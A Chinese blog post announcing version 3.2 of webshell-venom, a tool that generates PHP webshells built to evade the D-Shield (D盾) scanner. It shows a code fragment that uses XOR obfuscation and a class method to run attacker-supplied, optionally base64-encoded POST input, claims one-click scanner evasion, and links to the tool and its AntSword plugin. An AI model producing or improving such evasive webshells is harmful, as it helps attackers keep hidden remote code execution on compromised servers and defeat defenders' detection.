webshell-venom 3.2 :免杀D盾无压力 ——yzddMr6

前言

感谢大家对webshell-venom的支持

星球自开启以来已经源源不断有各路大佬加入

并且一起交流了很多的思路跟想法

为了不辜负大家的期望

自己这几天一大早上就起来写脚本发文章，基本上星球里都是一天两更

项目在今天也达到了700个星

image

所以特地推出webshell-venom 3.2版本

webshell-venom 3.2 的蚁剑插件版也已经在蚁剑商店上市

image

原来已经有的点击更新即可

3.2是github公开版，所有人都可以下载

(webshell-venom 3.x系列 不支持php7环境，如果需要星球内部版4.0请点击下面链接)

https://yzddmr6.tk/posts/webshell-venom-notice/

正文

样例

其实我当时还纠结是命名为3.2还是3.3

因为在 https://yzddmr6.tk/2019/08/13/webshell-venom-3-1-3-2/

这篇帖子里虽然说了3.2的更新，但是实际上并没有发布

后来研究了一下还可以用另一种方式绕过

就是套一个函数，把异或的返回值通过类里的函数进行传递。

具体的可以看一下下面的代码

AJZN();
@$UNOF($this->FJ);}}
$tipd=new TIPD();
@$tipd->FJ=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>

因为我说过D盾其实还是不认识异或的，至少还是不敏感。

用类里函数传参的方法也是一个很好的手段。

绕过的办法有很多，我只是提供一个demo。

使用方法

https://github.com/yzddmr6/webshell-venom/tree/master/php

蚁剑插件

image

老套路，直接生成

过盾截图

一键免杀D盾

image

image

更新后效果还不错，但是缺点就是有点长。。。

最后

免杀这一块不同于其他工具

其实很多人都有很好的方法，只不过是大家都不愿意分享

因为看看论坛里的帖子大家就会发现一个真理

分享就意味着失效

我分享出来也是为了让大家能开阔思路，更进一步

建立圈子也是为了创造一个更好的交流环境。共同提高

项目地址

https://github.com/yzddmr6/webshell-venom

蚁剑插件版

https://github.com/yzddmr6/as_webshell_venom